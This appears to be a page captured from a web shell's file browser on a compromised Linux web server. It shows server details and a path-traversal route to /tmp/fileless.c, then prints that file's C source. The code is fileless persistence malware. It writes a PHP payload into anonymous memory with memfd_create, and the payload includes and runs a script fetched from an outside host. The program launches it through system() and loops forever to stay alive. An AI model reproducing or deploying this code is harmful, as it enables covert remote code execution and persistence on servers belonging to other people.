uawdijnntqw1x1x1
IP : 216.73.216.123
Hostname : smartpanel.abcaweb.com
Kernel : Linux smartpanel.abcaweb.com 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
u4uwebca
/
.wp-cli
/
..
/
.subaccounts
/
..
/
ssl
/
..
/
..
/
..
/
tmp
/
fileless.c
/
/
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> #include <sys/stat.h> #include <fcntl.h> #include <string.h> int main() { int fd = memfd_create("wallnut_persist", MFD_CLOEXEC); if (fd < 0) return 1; const char* payload = "<?php include('http://4uweb.design/wallnut.php'); ?>"; write(fd, payload, strlen(payload)); char cmd[512]; sprintf(cmd, "php /proc/self/fd/%d &", fd); system(cmd); while(1) sleep(60); return 0; }
/home/u4uwebca/.wp-cli/../.subaccounts/../ssl/../../../tmp/fileless.c